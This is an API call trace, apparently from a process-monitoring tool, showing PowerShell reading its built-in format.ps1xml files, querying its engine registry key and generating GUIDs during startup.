	[0476.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0476.523] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xa278a629, Data2=0x5f34, Data3=0x4801, Data4=([0]=0xb9, [1]=0x59, [2]=0xf9, [3]=0x63, [4]=0x8, [5]=0x48, [6]=0xeb, [7]=0x5))) returned 0x0
	[0476.524] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x7cf25fe5, Data2=0x16d8, Data3=0x473e, Data4=([0]=0x82, [1]=0x4b, [2]=0x14, [3]=0xc7, [4]=0x71, [5]=0xf9, [6]=0x8c, [7]=0xbc))) returned 0x0
	[0476.524] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x77b59a7a, Data2=0xdeeb, Data3=0x47d1, Data4=([0]=0xab, [1]=0x68, [2]=0xe6, [3]=0xb, [4]=0x3, [5]=0x38, [6]=0xa2, [7]=0xf1))) returned 0x0
	[0476.525] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xf5115036, Data2=0x836, Data3=0x4ad1, Data4=([0]=0x82, [1]=0xd, [2]=0x17, [3]=0xfe, [4]=0xe2, [5]=0x6a, [6]=0xf6, [7]=0xda))) returned 0x0
	[0476.525] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xcf255321, Data2=0xc02a, Data3=0x4898, Data4=([0]=0x80, [1]=0x63, [2]=0x12, [3]=0x44, [4]=0x13, [5]=0xb, [6]=0x3a, [7]=0xb2))) returned 0x0
	[0476.526] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x8710ae9d, Data2=0xb954, Data3=0x45a2, Data4=([0]=0xbe, [1]=0x67, [2]=0x0, [3]=0xa0, [4]=0x2b, [5]=0x5e, [6]=0xcc, [7]=0x67))) returned 0x0
	[0476.526] VirtualQuery (in: lpAddress=0x1ebd40, lpBuffer=0x1ecc00, dwLength=0x30 | out: lpBuffer=0x1ecc00*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0476.527] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x712fffb1, Data2=0xeecf, Data3=0x4129, Data4=([0]=0x8d, [1]=0x15, [2]=0x0, [3]=0x5f, [4]=0x34, [5]=0x17, [6]=0xa7, [7]=0xc4))) returned 0x0
	[0476.528] VirtualQuery (in: lpAddress=0x1ebd40, lpBuffer=0x1ecc00, dwLength=0x30 | out: lpBuffer=0x1ecc00*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0476.529] VirtualQuery (in: lpAddress=0x1ebd40, lpBuffer=0x1ecc00, dwLength=0x30 | out: lpBuffer=0x1ecc00*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0476.530] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x2c72d450, Data2=0xa7e4, Data3=0x4d75, Data4=([0]=0x96, [1]=0x1a, [2]=0x71, [3]=0xf0, [4]=0x50, [5]=0x60, [6]=0x68, [7]=0x1f))) returned 0x0
	[0476.530] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x25aa9679, Data2=0xeff0, Data3=0x4fe1, Data4=([0]=0x87, [1]=0x5c, [2]=0x9, [3]=0x4f, [4]=0xd5, [5]=0x5f, [6]=0xf0, [7]=0xad))) returned 0x0
	[0476.530] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x85731b66, Data2=0x1301, Data3=0x47cc, Data4=([0]=0x8d, [1]=0x7, [2]=0xff, [3]=0x4e, [4]=0x86, [5]=0xfa, [6]=0x7f, [7]=0xb8))) returned 0x0
	[0476.530] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x6dce36bd, Data2=0xc7a0, Data3=0x4c7e, Data4=([0]=0x81, [1]=0xed, [2]=0xa3, [3]=0x29, [4]=0x1, [5]=0x1a, [6]=0x39, [7]=0x9a))) returned 0x0
	[0476.530] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x837d67a3, Data2=0xf889, Data3=0x40a8, Data4=([0]=0x99, [1]=0xf2, [2]=0x6b, [3]=0xf5, [4]=0xa5, [5]=0xf4, [6]=0x0, [7]=0xe5))) returned 0x0
	[0476.531] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x820f7829, Data2=0xa4d7, Data3=0x4993, Data4=([0]=0x98, [1]=0x1, [2]=0x70, [3]=0x63, [4]=0xe5, [5]=0x43, [6]=0x87, [7]=0x78))) returned 0x0
	[0476.531] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xba8e2cad, Data2=0x3a09, Data3=0x4297, Data4=([0]=0x93, [1]=0x9f, [2]=0xe1, [3]=0x2a, [4]=0xba, [5]=0xe, [6]=0x15, [7]=0xd4))) returned 0x0
	[0476.531] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x3ad6c748, Data2=0xf29e, Data3=0x4f10, Data4=([0]=0x88, [1]=0xfb, [2]=0x13, [3]=0xe3, [4]=0xab, [5]=0xea, [6]=0xfd, [7]=0x49))) returned 0x0
	[0476.531] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x1321ddf0, Data2=0xa743, Data3=0x43f7, Data4=([0]=0xaa, [1]=0x91, [2]=0xa9, [3]=0xb6, [4]=0xd3, [5]=0xbe, [6]=0xfb, [7]=0x91))) returned 0x0
	[0476.531] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x9eea281a, Data2=0xa7ce, Data3=0x45be, Data4=([0]=0xb6, [1]=0x14, [2]=0x60, [3]=0x24, [4]=0xb0, [5]=0xeb, [6]=0x9d, [7]=0xfb))) returned 0x0
	[0476.532] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x16c629b8, Data2=0x999d, Data3=0x43ac, Data4=([0]=0xaf, [1]=0xc3, [2]=0xd3, [3]=0xf7, [4]=0x77, [5]=0xb6, [6]=0x75, [7]=0xd7))) returned 0x0
	[0476.532] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xcd7d6c4d, Data2=0xc692, Data3=0x4d7f, Data4=([0]=0x88, [1]=0x73, [2]=0x19, [3]=0x83, [4]=0x5d, [5]=0x44, [6]=0x68, [7]=0x98))) returned 0x0
	[0476.532] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x67b53b1a, Data2=0x27b3, Data3=0x4045, Data4=([0]=0x9b, [1]=0x91, [2]=0xd7, [3]=0x36, [4]=0x36, [5]=0xbd, [6]=0x19, [7]=0x47))) returned 0x0
	[0476.532] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x5f97ee13, Data2=0x3fe3, Data3=0x49cc, Data4=([0]=0xb1, [1]=0xf9, [2]=0x7c, [3]=0xed, [4]=0xaf, [5]=0x73, [6]=0x7d, [7]=0x7f))) returned 0x0
	[0476.532] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x2c1fc909, Data2=0xf89b, Data3=0x4a37, Data4=([0]=0x8a, [1]=0x1e, [2]=0x93, [3]=0x44, [4]=0x38, [5]=0xa4, [6]=0x15, [7]=0x54))) returned 0x0
	[0476.532] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xd4696fb4, Data2=0x52, Data3=0x4e65, Data4=([0]=0x91, [1]=0xc6, [2]=0x81, [3]=0xd5, [4]=0x83, [5]=0x5, [6]=0x20, [7]=0xe0))) returned 0x0
	[0476.532] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x58a47dd0, Data2=0xdef0, Data3=0x414b, Data4=([0]=0x95, [1]=0x25, [2]=0xfb, [3]=0xd, [4]=0x87, [5]=0xe3, [6]=0xe5, [7]=0xb4))) returned 0x0
	[0476.533] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x394dc358, Data2=0x6263, Data3=0x47be, Data4=([0]=0xaa, [1]=0x16, [2]=0xb4, [3]=0xa5, [4]=0x52, [5]=0x2e, [6]=0x52, [7]=0x1c))) returned 0x0
	[0476.533] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x49248e13, Data2=0x8c7c, Data3=0x4a94, Data4=([0]=0xa7, [1]=0x16, [2]=0xd2, [3]=0xea, [4]=0x68, [5]=0xdc, [6]=0x19, [7]=0x86))) returned 0x0
	[0476.533] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x9ca548f3, Data2=0xb135, Data3=0x4562, Data4=([0]=0xae, [1]=0xf2, [2]=0x39, [3]=0xe5, [4]=0x99, [5]=0xb, [6]=0xde, [7]=0x0))) returned 0x0
	[0476.533] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xf26390c6, Data2=0xe5ff, Data3=0x47d2, Data4=([0]=0xac, [1]=0xd7, [2]=0xb, [3]=0x23, [4]=0xc7, [5]=0x8f, [6]=0x82, [7]=0x22))) returned 0x0
	[0476.533] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x6181d396, Data2=0xe61d, Data3=0x409d, Data4=([0]=0xb7, [1]=0xb7, [2]=0xae, [3]=0x95, [4]=0xde, [5]=0xcf, [6]=0xc4, [7]=0x4e))) returned 0x0
	[0476.533] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x635da19f, Data2=0x9ec3, Data3=0x47e3, Data4=([0]=0x99, [1]=0x84, [2]=0x23, [3]=0x7b, [4]=0x71, [5]=0xe7, [6]=0x84, [7]=0x72))) returned 0x0
	[0476.533] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x60921879, Data2=0x35b8, Data3=0x4d09, Data4=([0]=0x8d, [1]=0xcf, [2]=0x61, [3]=0x30, [4]=0xa9, [5]=0xc, [6]=0x4f, [7]=0xdc))) returned 0x0
	[0476.533] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xafe9ae1c, Data2=0x20be, Data3=0x4762, Data4=([0]=0x91, [1]=0x61, [2]=0x7c, [3]=0x9, [4]=0x5c, [5]=0x1c, [6]=0x40, [7]=0x9b))) returned 0x0
	[0476.534] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x3c78d229, Data2=0x3ed8, Data3=0x4811, Data4=([0]=0x99, [1]=0x91, [2]=0xc, [3]=0xc7, [4]=0x82, [5]=0x96, [6]=0xfc, [7]=0x7c))) returned 0x0
	[0476.534] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xf3ebbdc4, Data2=0xed0f, Data3=0x4e39, Data4=([0]=0xbe, [1]=0x8b, [2]=0x61, [3]=0x8a, [4]=0x4a, [5]=0x62, [6]=0x39, [7]=0x3e))) returned 0x0
	[0476.534] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x99c9f558, Data2=0x48f7, Data3=0x41ca, Data4=([0]=0x80, [1]=0x55, [2]=0xcb, [3]=0x67, [4]=0x19, [5]=0x2c, [6]=0xb0, [7]=0xda))) returned 0x0
	[0476.534] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x3dd77f1e, Data2=0xb90d, Data3=0x456d, Data4=([0]=0xb7, [1]=0xd8, [2]=0x3e, [3]=0xd9, [4]=0xb2, [5]=0x24, [6]=0xb7, [7]=0xd7))) returned 0x0
	[0476.535] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xb66314f0, Data2=0x3c55, Data3=0x4bef, Data4=([0]=0xa5, [1]=0x84, [2]=0xdf, [3]=0xa2, [4]=0xa0, [5]=0x18, [6]=0xda, [7]=0xf6))) returned 0x0
	[0476.535] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0476.535] GetFileType (hFile=0x320) returned 0x1
	[0476.535] SetErrorMode (uMode=0x1) returned 0x1
	[0476.535] GetFileType (hFile=0x320) returned 0x1
	[0476.535] ReadFile (in: hFile=0x320, lpBuffer=0x36e60d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x36e60d8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.537] ReadFile (in: hFile=0x320, lpBuffer=0x36e60d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x36e60d8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.537] ReadFile (in: hFile=0x320, lpBuffer=0x36e60d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x36e60d8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.537] ReadFile (in: hFile=0x320, lpBuffer=0x36e60d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x36e60d8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.538] ReadFile (in: hFile=0x320, lpBuffer=0x36e60d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x36e60d8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.538] ReadFile (in: hFile=0x320, lpBuffer=0x36e60d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x36e60d8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.538] ReadFile (in: hFile=0x320, lpBuffer=0x36e60d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x36e60d8*, lpNumberOfBytesRead=0x1ed0d8*=0x119, lpOverlapped=0x0) returned 1
	[0476.538] ReadFile (in: hFile=0x320, lpBuffer=0x36e60d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x36e60d8*, lpNumberOfBytesRead=0x1ed0d8*=0x0, lpOverlapped=0x0) returned 1
	[0476.538] CloseHandle (hObject=0x320) returned 1
	[0476.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ece20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0476.539] SetErrorMode (uMode=0x1) returned 0x1
	[0476.539] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed080 | out: lpFileInformation=0x1ed080*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0476.539] SetErrorMode (uMode=0x1) returned 0x1
	[0476.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0476.539] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed168 | out: phkResult=0x1ed168*=0x320) returned 0x0
	[0476.539] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed0ec, lpData=0x0, lpcbData=0x1ed0e8*=0x0 | out: lpType=0x1ed0ec*=0x1, lpData=0x0, lpcbData=0x1ed0e8*=0x56) returned 0x0
	[0476.539] CoTaskMemAlloc (cb=0x5a) returned 0x4a6080
	[0476.539] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed0bc, lpData=0x4a6080, lpcbData=0x1ed0b8*=0x56 | out: lpType=0x1ed0bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed0b8*=0x56) returned 0x0
	[0476.539] CoTaskMemFree (pv=0x4a6080) 
	[0476.540] RegCloseKey (hKey=0x320) returned 0x0
	[0476.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0476.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0476.541] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x54b04cc7, Data2=0x2e9f, Data3=0x4af4, Data4=([0]=0x9a, [1]=0xa4, [2]=0xc4, [3]=0x1d, [4]=0x69, [5]=0x1e, [6]=0x11, [7]=0x3a))) returned 0x0
	[0476.542] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x17260be9, Data2=0x7f22, Data3=0x494c, Data4=([0]=0x9e, [1]=0x78, [2]=0xf2, [3]=0xd4, [4]=0xdc, [5]=0x10, [6]=0x47, [7]=0xb1))) returned 0x0
	[0476.542] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x6404bbcc, Data2=0xbc49, Data3=0x4182, Data4=([0]=0x90, [1]=0x7e, [2]=0xbb, [3]=0xe1, [4]=0x9d, [5]=0x94, [6]=0x39, [7]=0xf4))) returned 0x0
	[0476.542] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xa7e0a8d4, Data2=0x9cb0, Data3=0x4104, Data4=([0]=0xa6, [1]=0x24, [2]=0xca, [3]=0xe6, [4]=0xd6, [5]=0x4c, [6]=0x80, [7]=0x36))) returned 0x0
	[0476.542] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0476.542] GetFileType (hFile=0x320) returned 0x1
	[0476.542] SetErrorMode (uMode=0x1) returned 0x1
	[0476.542] GetFileType (hFile=0x320) returned 0x1
	[0476.543] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.544] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.545] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.545] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.546] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.546] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.546] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.546] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.547] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.547] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.547] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.547] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.548] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.548] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.548] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.548] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.549] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.550] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.550] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.550] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.550] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.550] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.551] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.551] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.551] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.551] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.552] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.195] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.195] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
